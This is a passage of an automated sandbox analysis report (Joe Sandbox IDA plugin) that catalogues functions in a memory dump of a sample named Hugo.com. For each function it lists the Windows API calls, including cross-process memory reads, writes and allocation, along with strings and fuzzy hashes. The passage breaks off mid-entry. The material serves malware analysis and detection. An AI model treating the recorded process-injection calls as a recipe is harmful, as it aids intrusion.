Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60

_free.LIBCMT ref: 00F4DAE4
_free.LIBCMT ref: 00F4DAF6
_free.LIBCMT ref: 00F4DB08
_free.LIBCMT ref: 00F4DB1A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3ebdddff3ab3adcb6d404846e1159e4148d0a9f08d2949bb8198f9359d90ea1a
Instruction ID: bafd8a804cc70df6adaeedcfa5bf4b471fe66d090059e8507b693b86610a6e2c
Opcode Fuzzy Hash: 3ebdddff3ab3adcb6d404846e1159e4148d0a9f08d2949bb8198f9359d90ea1a
Instruction Fuzzy Hash: AEF01232D45608AB8665EB78EDC5D1ABFEEEE447207D50C16F809D7501CB38FC80B654

Function 00F42610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F4262E

Part of subcall function 00F42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4), ref: 00F42D4E
Part of subcall function 00F42D38: GetLastError.KERNEL32(00FE1DC4,?,00F4DB51,00FE1DC4,00000000,00FE1DC4,00000000,?,00F4DB78,00FE1DC4,00000007,00FE1DC4,?,00F4DF75,00FE1DC4,00FE1DC4), ref: 00F42D60

_free.LIBCMT ref: 00F42640
_free.LIBCMT ref: 00F42653
_free.LIBCMT ref: 00F42664
_free.LIBCMT ref: 00F42675

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2cd5e39bc5cbd488a4081b749ba81ab4d6bdab1d903e7fe57f2d4ee81a1ac79e
Instruction ID: fad826224b62e68c49de7a5b9fbe323eb48a709f0d2bd1700d00066349fed521
Opcode Fuzzy Hash: 2cd5e39bc5cbd488a4081b749ba81ab4d6bdab1d903e7fe57f2d4ee81a1ac79e
Instruction Fuzzy Hash: 24F0FE70C421A89B9B82AF65FCC18497F79FB24761385093BF814DA275D7360901BFC4

Function 00F412B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00F41469
__freea.LIBCMT ref: 00F41487

Part of subcall function 00F418A7: _free.LIBCMT ref: 00F418BF

Strings

am/pm, xrefs: 00F414EA
a/p, xrefs: 00F4154E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 168482ab8f6f9cb260460c7fe1106c807883da114ea9dbc2092f150539a16cd1
Instruction ID: e7d3aa13bbf7cd3748011f303e78232a2bb964808214f2e8d231007ef616e6fb
Opcode Fuzzy Hash: 168482ab8f6f9cb260460c7fe1106c807883da114ea9dbc2092f150539a16cd1
Instruction Fuzzy Hash: 7CD10276E10206DACB249F68C8557FABFB1FF06320F29415AED029B250D3359DC0EBA0

Function 00F73063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F72B1D,?,?,00000034,00000800,?,00000034), ref: 00F7BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F730AD

Part of subcall function 00F7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00F7BDBF

Part of subcall function 00F7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00F7BD1C
Part of subcall function 00F7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F7BD2C
Part of subcall function 00F7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00F7BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F7311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F73167

Strings

@, xrefs: 00F7317F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: aef215e1aa3ef6443e4a8f2a02273269851845ba1779f499553db6e17da48c21
Instruction ID: 48c77020b7bfbdf469512377f590b26b1e36a34f80dae5d5b7c3e3c88ab6743f
Opcode Fuzzy Hash: aef215e1aa3ef6443e4a8f2a02273269851845ba1779f499553db6e17da48c21
Instruction Fuzzy Hash: B2412D72D00218BEDB11DBA4CD45BDEB7B8EF46710F008096F959B7180DA746F85EB61

Function 00F41A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com,00000104), ref: 00F41AD9
_free.LIBCMT ref: 00F41BA4
_free.LIBCMT ref: 00F41BAE

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com, xrefs: 00F41AD0, 00F41AD7, 00F41B06, 00F41B3E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com
API String ID: 2506810119-4254922787
Opcode ID: e858dadb1bf38fbdc50d8ac1dc295831447db59ac0c5a1ed482b45e08bf7788a
Instruction ID: 6c25de1b613de0e83e36ad5f3d7727b4ddafa4ca7b69af58375398daffb95260
Opcode Fuzzy Hash: e858dadb1bf38fbdc50d8ac1dc295831447db59ac0c5a1ed482b45e08bf7788a
Instruction Fuzzy Hash: A4316F71E00258ABDB21DF99DC85D9EBFFCFB85720B1041A6FD049B221E6744E80EB90

Function 00F7CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00F7CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00F7CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00FE29C0,01764908), ref: 00F7CC40

Strings

0, xrefs: 00F7CB8A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: dc9f71cc9f86b61e5d455f7a6beccfdf14e71b5ae2e7c72aa9bdf11c0e04aee5
Instruction ID: 67242856179f2654cf328926f8f031318b7bc5e49f8163cdbfdc1fcae2e96c60
Opcode Fuzzy Hash: dc9f71cc9f86b61e5d455f7a6beccfdf14e71b5ae2e7c72aa9bdf11c0e04aee5
Instruction Fuzzy Hash: 5641E1716043429FD725DF24DC85F5ABBE8AF85720F04861EF4A997291CB34E904DB93

Function 00FA4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FADCD0,00000000,?,?,?,?), ref: 00FA4F48
GetWindowLongW.USER32 ref: 00FA4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA4F75

Strings

SysTreeView32, xrefs: 00FA4F1A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: b3b0ddcc83dc0edd08d7d91695859a8d7dbd5f8a5ab72bf8ac72e1421e7d09af
Instruction ID: 1416902ab1a81d792ea798115008a0315353073b4f9c5dee55a998dcd8e05ce6
Opcode Fuzzy Hash: b3b0ddcc83dc0edd08d7d91695859a8d7dbd5f8a5ab72bf8ac72e1421e7d09af
Instruction Fuzzy Hash: 3E31B0B1610209AFDB208F38CC45BEA77A9EB4A374F204715F979A31E0D7B4EC50AB50

Function 00F93AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00F93AD4,?,?), ref: 00F93DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
_wcslen.LIBCMT ref: 00F93AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00F93B63

Strings

255.255.255.255, xrefs: 00F93AF2, 00F93AF7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 83a0291e2bc5f3687cb7ff5f94ccfc56337d827637f0d0d217636ca25bbeacd4
Instruction ID: 9879de76f1be170f782ddfc2d8b0c8f29cff89615fbcf0f3f186a02104cdf238
Opcode Fuzzy Hash: 83a0291e2bc5f3687cb7ff5f94ccfc56337d827637f0d0d217636ca25bbeacd4
Instruction Fuzzy Hash: AA31D535600201DFEF10CF28C485E6977F1EF95328F258159E8168B7A2D735EE41E760

Function 00FA4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FA49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FA49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA4A14

Strings

SysMonthCal32, xrefs: 00FA49A7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: a099484b6382abe79c418f0fdd414ef4e573baec2fdeeebdb68dadbc20ee5572
Instruction ID: 3b26b8cad92006f0518ac960edee8871be5f8aec724613a51e28ecebcc4d139f
Opcode Fuzzy Hash: a099484b6382abe79c418f0fdd414ef4e573baec2fdeeebdb68dadbc20ee5572
Instruction Fuzzy Hash: 8F21BF72640219ABDF118F90CC42FEB3B79EF89724F110214FA156B1D0D6B5B851ABA0

Function 00FA50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00FA51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00FA51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FA51B8

Strings

msctls_updown32, xrefs: 00FA5122

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 36512395acc872569163343a65d9dca239dfa9bda3fa35f92ef763100f9386c2
Instruction ID: 8a8ce0e361843236856ca96c40532401ea7fb712a3cbd3905822e7be6fd0de6f
Opcode Fuzzy Hash: 36512395acc872569163343a65d9dca239dfa9bda3fa35f92ef763100f9386c2
Instruction Fuzzy Hash: E92190F5600649AFDB00DF24CCC1EBB37ADEB5A7A4B040059F9009B361CB74EC01EAA0

Function 00FA4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00FA42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00FA42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00FA4312

Strings

Listbox, xrefs: 00FA42AB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f7cdda346711fdd7de1cc31cd39172d7956f260f8bab5f365ba8a4c633b8c7ce
Instruction ID: f362f1dd1fa2f101103149fb13d2dbd4409e5953ee51fe1d69cf5e863a214a80
Opcode Fuzzy Hash: f7cdda346711fdd7de1cc31cd39172d7956f260f8bab5f365ba8a4c633b8c7ce
Instruction Fuzzy Hash: FA219572A10218BBDF118F94CC85FAB37AEEFCA764F118114F9059B190C6B1AC52A7A0

Function 00F85439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F8544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F854A1
SetErrorMode.KERNEL32(00000000,?,?,00FADCD0), ref: 00F85515

Strings

%lu, xrefs: 00F854B4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: afb0f706c83c042936d5933a816a6c487a670574f0303e936131f251c67aab3d
Instruction ID: 80d42d93dfd6f1901080952ba305b16e90451027f917a20ea636e93b9bbe2f38
Opcode Fuzzy Hash: afb0f706c83c042936d5933a816a6c487a670574f0303e936131f251c67aab3d
Instruction Fuzzy Hash: 5E317374A00109AFDB10EF54C885EAA7BF8EF05318F1440A5F409DB262DB75EE45EB61

Function 00FA4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00FA4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00FA4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00FA4D0F

Strings

msctls_trackbar32, xrefs: 00FA4CC4

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1da440dec5b700ee530cbe27b1d47375b04a0876bd3343570b59d0ee13badbcd
Instruction ID: dc144f4b89988f928442b00fa46aa0d33501b7c6138fefb8f9675b44d975bb84
Opcode Fuzzy Hash: 1da440dec5b700ee530cbe27b1d47375b04a0876bd3343570b59d0ee13badbcd
Instruction Fuzzy Hash: 76110AB1640248BEEF115F65CC06FEB3BACEFC6764F110515FA55D60A0D6B1EC51AB10

Function 00F7389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F18577: _wcslen.LIBCMT ref: 00F1858A

Part of subcall function 00F736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F73712
Part of subcall function 00F736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F73723
Part of subcall function 00F736F4: GetCurrentThreadId.KERNEL32 ref: 00F7372A
Part of subcall function 00F736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F73731

GetFocus.USER32 ref: 00F738C4

Part of subcall function 00F7373B: GetParent.USER32(00000000), ref: 00F73746

GetClassNameW.USER32(?,?,00000100), ref: 00F7390F
EnumChildWindows.USER32(?,00F73987), ref: 00F73937

Strings

%s%d, xrefs: 00F7394B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 70858fcab852a8bafe977cd0087c7a80cae585b6b7b28a10e1aaa9dcadad4635
Instruction ID: 5c0dde7bf245fb1dc7d6fc97433e996c8020812c06ca997fb10501b8cbdd061b
Opcode Fuzzy Hash: 70858fcab852a8bafe977cd0087c7a80cae585b6b7b28a10e1aaa9dcadad4635
Instruction Fuzzy Hash: BC11D5B16002097BCF01BF749C85EED777A9F94354F048066B90D9B292CE749946BB21

Function 00FA6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00FA638D
DrawMenuBar.USER32(?), ref: 00FA639C

Strings

0, xrefs: 00FA632E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 24bcd4574e0e93e6183d209e3d33d28936a3e1b9319a22089b2455393e42b82a
Instruction ID: fb0d5bf055184df6e290e2fa6ecf016a53f59348b34c79495fef4c9cfa4cc25a
Opcode Fuzzy Hash: 24bcd4574e0e93e6183d209e3d33d28936a3e1b9319a22089b2455393e42b82a
Instruction Fuzzy Hash: 380161B2910218AFDF119F11DC84FAE7BB4FB46761F188099E84AD6150DF308985FF21

Function 00F6E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00F6E797
FreeLibrary.KERNEL32 ref: 00F6E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 00F6E791
X64, xrefs: 00F6E680

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 31f830245e4cd8963230f4de9fb2208cd627b21d81e6c3e479d02c8aea7b7187
Instruction ID: 916e4ef6a3773d17bc098a9b49772812de9e39ef0b19eb54a870074e08544981
Opcode Fuzzy Hash: 31f830245e4cd8963230f4de9fb2208cd627b21d81e6c3e479d02c8aea7b7187
Instruction Fuzzy Hash: E7E02BBBD226309FF77256208C84FA932246F11704B150565E802E2111EB20CD44BE55

Function 00F7096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

